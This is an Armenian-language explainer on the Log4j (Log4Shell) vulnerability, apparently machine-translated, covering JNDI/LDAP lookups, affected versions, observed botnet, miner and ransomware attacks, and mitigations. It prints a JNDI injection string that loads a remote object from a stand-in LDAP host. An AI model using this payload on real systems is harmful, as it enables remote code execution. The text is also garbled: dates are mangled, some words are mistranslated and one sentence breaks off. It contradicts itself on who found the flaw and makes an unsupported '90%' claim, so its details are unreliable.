Բառը[Թաքցնել][Ցուցադրում]
2021 թվականի նոյեմբերի վերջին մենք բացահայտեցինք կիբերանվտանգության հիմնական սպառնալիքը։ Այս շահագործումը կարող է ազդել միլիոնավոր համակարգչային համակարգերի վրա ամբողջ աշխարհում:
Սա Log4j խոցելիության ուղեցույց է և այն մասին, թե ինչպես է անտեսված դիզայնի թերությունը աշխարհի համակարգչային ծառայությունների 90%-ից բաց թողել հարձակման համար:
Apache Log4j-ը բաց կոդով Java-ի վրա հիմնված անտառահատումների ծրագիր է, որը մշակվել է Apache Software Foundation-ի կողմից: Սկզբնապես գրվել է Չեկի Գյուլչուի կողմից 2001 թվականին, այն այժմ մաս է կազմում Apache Logging Services-ի՝ Apache Software Foundation-ի նախագծի:
Ընկերություններն ամբողջ աշխարհում օգտագործում են Log4j գրադարանը՝ իրենց հավելվածներում մուտք գործելու հնարավորություն տալու համար: Իրականում, Java գրադարանն այնքան տարածված է, որ դուք կարող եք գտնել այն Amazon-ի, Microsoft-ի, Google-ի և այլնի հավելվածներում:
Գրադարանի նշանավոր լինելը նշանակում է, որ կոդի ցանկացած հնարավոր թերություն կարող է միլիոնավոր համակարգիչներ բաց թողնել հաքերային հարձակման համար: 24 թվականի նոյեմբերի 2021-ին Ա ամպի անվտանգություն Alibaba-ում աշխատող հետազոտողը սարսափելի թերություն է հայտնաբերել.
Log4j խոցելիությունը, որը նաև հայտնի է որպես Log4Shell, աննկատ գոյություն ուներ 2013 թվականից: Խոցելիությունը թույլ էր տալիս չարամիտ խաղացողներին գործարկել կոդը ազդակիր համակարգերի վրա, որոնք աշխատում են Log4j-ում: Այն հրապարակայնորեն բացահայտվել է 9 թվականի դեկտեմբերի 2021-ին
Ոլորտի փորձագետները Log4Shell-ի թերությունն անվանում են վերջին հիշողության ամենամեծ խոցելիությունը.
Խոցելիության հրապարակմանը հաջորդած շաբաթվա ընթացքում կիբերանվտանգության թիմերը միլիոնավոր հարձակումներ են հայտնաբերել: Որոշ հետազոտողներ նույնիսկ նկատել են րոպեում հարյուրից ավելի հարձակումների արագություն:
Ինչպես է դա աշխատում?
Հասկանալու համար, թե ինչու է Log4Shell-ն այդքան վտանգավոր, մենք պետք է հասկանանք, թե ինչի է այն ընդունակ:
Log4Shell խոցելիությունը թույլ է տալիս կամայական կոդի կատարում, ինչը հիմնականում նշանակում է, որ հարձակվողը կարող է ցանկացած հրաման կամ կոդ գործարկել թիրախային մեքենայի վրա:
Ինչպե՞ս է դա անում:
Նախ, մենք պետք է հասկանանք, թե ինչ է JNDI-ն:
Java Naming and Directory Interface (JNDI) Java ծառայություն է, որը թույլ է տալիս Java ծրագրերին հայտնաբերել և փնտրել տվյալներ և ռեսուրսներ անվան միջոցով: Այս գրացուցակային ծառայությունները կարևոր են, քանի որ դրանք ապահովում են գրանցումների կազմակերպված հավաքածու, որպեսզի մշակողները հեշտությամբ հղում կատարեն հավելվածներ ստեղծելիս:
JNDI-ն կարող է օգտագործել տարբեր արձանագրություններ՝ որոշակի գրացուցակ մուտք գործելու համար: Այս արձանագրություններից մեկը Lightweight Directory Access Protocol-ն է կամ LDAP-ը:
Տող մուտքագրելիս, log4j կատարում է տողերի փոխարինումներ, երբ հանդիպում են ձևի արտահայտություններին ${prefix:name}
.
Օրինակ, Text: ${java:version}
կարող է գրանցվել որպես Տեքստ՝ Java տարբերակ 1.8.0_65: Այս տեսակի փոխարինումները սովորական են:
Կարող ենք ունենալ նաև այնպիսի արտահայտություններ, ինչպիսիք են Text: ${jndi:ldap://example.com/file}
որն օգտագործում է JNDI համակարգը՝ LDAP արձանագրության միջոցով URL-ից Java օբյեկտ բեռնելու համար:
Սա արդյունավետորեն բեռնում է այդ URL-ից ստացվող տվյալները մեքենայի մեջ: Ցանկացած պոտենցիալ հաքեր կարող է չարամիտ ծածկագիր տեղադրել հանրային URL-ում և սպասել, որ Log4j օգտագործող մեքենաները գրանցեն այն:
Քանի որ տեղեկամատյանների հաղորդագրությունների բովանդակությունը պարունակում է օգտագործողի կողմից վերահսկվող տվյալներ, հաքերները կարող են տեղադրել իրենց սեփական JNDI հղումները, որոնք մատնանշում են իրենց կողմից վերահսկվող LDAP սերվերները: Այս LDAP սերվերները կարող են լի լինել վնասակար Java օբյեկտներով, որոնք JNDI-ն կարող է գործարկել խոցելիության միջոցով:
Սա ավելի վատթարացնում է այն, որ կարևոր չէ հավելվածը սերվերի կողմից է, թե հաճախորդի կողմից:
Քանի դեռ լոգերի համար կա հարձակվողի վնասակար կոդը կարդալու միջոց, հավելվածը դեռ բաց է շահագործման համար:
Ով է ազդում:
Խոցելիությունը ազդում է բոլոր համակարգերի և ծառայությունների վրա, որոնք օգտագործում են APache Log4j՝ 2.0-ից մինչև 2.14.1 տարբերակներով:
Անվտանգության մի քանի փորձագետներ խորհուրդ են տալիս, որ խոցելիությունը կարող է ազդել Java-ի մի շարք հավելվածների վրա:
Թերությունն առաջին անգամ հայտնաբերվել է Microsoft-ին պատկանող Minecraft տեսախաղում: Microsoft-ը հորդորել է իր օգտատերերին թարմացնել իրենց Java տարբերակի Minecraft ծրագրակազմը՝ ցանկացած ռիսկ կանխելու համար:
Կիբերանվտանգության և ենթակառուցվածքների անվտանգության գործակալության (CISA) տնօրեն Ջեն Իսթերլին ասում է, որ վաճառողներն ունեն հիմնական պատասխանատվությունը վերջնական օգտագործողներին կանխելու այս խոցելիությունը չարամիտ գործող անձանց կողմից:
«Վաճառողները պետք է նաև շփվեն իրենց հաճախորդների հետ, որպեսզի վերջնական օգտատերերը իմանան, որ իրենց արտադրանքը պարունակում է այս խոցելիությունը և պետք է առաջնահերթություն տան ծրագրային ապահովման թարմացումներին»:
Հաղորդվում է, որ հարձակումներն արդեն սկսվել են: Symantec ընկերությունը, որը տրամադրում է կիբերանվտանգության ծրագրակազմ, դիտարկել է բազմաթիվ հարձակման հարցումներ:
Ահա մի քանի օրինակներ այն հարձակումների տեսակների, որոնք հետազոտողները հայտնաբերել են.
- botnets
Բոտնետները համակարգիչների ցանց են, որոնք գտնվում են մեկ հարձակվող կողմի հսկողության տակ: Նրանք օգնում են կատարել DDoS հարձակումներ, գողանալ տվյալներ և այլ խարդախություններ: Հետազոտողները դիտարկել են Muhstik բոտնետը Log4j-ից ներբեռնված shell սկրիպտներում:
- XMRig Miner Trojan
XMRig-ը կրիպտոարժույթի բաց կոդով հանքափոր է, որն օգտագործում է պրոցեսորներ Monero թոքենի մայնինգի համար: Կիբերհանցագործները կարող են XMRig-ը տեղադրել մարդկանց սարքերում, որպեսզի նրանք կարողանան օգտագործել իրենց մշակող հզորությունը՝ առանց նրանց իմացության:
- Khonsari Ransomware
Ransomware-ը վերաբերում է չարամիտ ծրագրի ձևին, որը նախատեսված է դրա համար գաղտնագրել ֆայլերը համակարգչի վրա։ Այնուհետև հարձակվողները կարող են վճարումներ պահանջել՝ գաղտնագրված ֆայլերին հասանելիություն վերադարձնելու դիմաց: Հետազոտողները հայտնաբերել են Khonsari փրկագին Log4Shell հարձակումների ժամանակ: Նրանք թիրախավորում են Windows սերվերները և օգտագործում են .NET Framework-ը:
Ինչ է տեղի ունենում հաջորդ?
Փորձագետները կանխատեսում են, որ Log4J խոցելիության հետևանքով առաջացած քաոսը լիովին շտկելու համար կարող է պահանջվել ամիսներ կամ նույնիսկ տարիներ:
Այս գործընթացը ներառում է յուրաքանչյուր տուժած համակարգի թարմացում կարկատված տարբերակով: Նույնիսկ եթե այս բոլոր համակարգերը կարկատված են, դեռ կա հավանական հետնադռների սպառնալիք, որը հաքերները կարող են արդեն ավելացրել այն պատուհանին, որ սերվերները բաց են հարձակման համար:
Շատ լուծումներ և մեղմացումներ գոյություն ունեն այս սխալի կողմից հավելվածների շահագործումը կանխելու համար: Նոր Log4j տարբերակը 2.15.0-rc1 փոխել է տարբեր կարգավորումներ՝ մեղմելու այս խոցելիությունը:
JNDI-ի օգտագործող բոլոր գործառույթները կանջատվեն լռելյայնորեն, իսկ հեռահար որոնումները նույնպես սահմանափակված են: Ձեր Log4j-ի կարգավորումների որոնման գործառույթն անջատելը կօգնի նվազեցնել հնարավոր շահագործումների ռիսկը:
Log4j-ից դուրս դեռևս կարիք կա ավելի լայն ծրագրի՝ բաց կոդով շահագործումը կանխելու համար:
Ավելի վաղ՝ մայիսին, Սպիտակ տունը հրապարակել էր ան գործադիր հանձնարարականը որի նպատակն էր բարելավել ազգային կիբերանվտանգությունը։ Այն ներառում էր նյութերի ծրագրային օրինագծի (SBOM) դրույթ, որն ըստ էության պաշտոնական փաստաթուղթ էր, որը պարունակում էր հավելվածը ստեղծելու համար անհրաժեշտ յուրաքանչյուր կետի ցանկ:
Սա ներառում է այնպիսի մասեր, ինչպիսիք են բաց աղբյուր փաթեթներ, կախվածություններ և API-ներ, որոնք օգտագործվում են մշակման համար: Թեև SBOM-ների գաղափարը օգտակար է թափանցիկության համար, արդյոք այն իսկապես կօգնի սպառողին:
Կախվածության արդիականացումը կարող է չափազանց մեծ դժվարություն առաջացնել: Ընկերությունները կարող են պարզապես ընտրել վճարել ցանկացած տուգանք, այլ ոչ թե ռիսկի դիմել լրացուցիչ ժամանակ կորցնելու այլընտրանքային փաթեթներ գտնելու համար: Թերևս այս SBOM-ները օգտակար կլինեն միայն այն դեպքում, եթե դրանք շրջանակ սահմանափակվում է ավելի.
Եզրափակում
Log4j-ի խնդիրը կազմակերպությունների համար ավելին է, քան պարզապես տեխնիկական խնդիր:
Բիզնեսի ղեկավարները պետք է տեղյակ լինեն պոտենցիալ ռիսկերի մասին, որոնք կարող են առաջանալ, երբ իրենց սերվերները, ապրանքները կամ ծառայությունները հիմնվում են կոդերի վրա, որոնք իրենք իրենք չեն պահպանում:
Բաց կոդով և երրորդ կողմի հավելվածների վրա հույս դնելը միշտ որոշակի ռիսկ է պարունակում: Ընկերությունները պետք է մտածեն ռիսկերի նվազեցման ռազմավարությունների մշակման մասին՝ նախքան նոր սպառնալիքների ի հայտ գալը:
Համացանցի մեծ մասը հիմնված է բաց կոդով ծրագրաշարի վրա, որը պահպանվում է հազարավոր կամավորների կողմից ամբողջ աշխարհում:
Եթե մենք ցանկանում ենք համացանցը պահել անվտանգ վայրում, կառավարությունները և կորպորացիաները պետք է ներդրումներ կատարեն բաց կոդով ջանքերի և կիբերանվտանգության գործակալությունների ֆինանսավորման մեջ, ինչպիսիք են. CISA.
Թողնել գրառում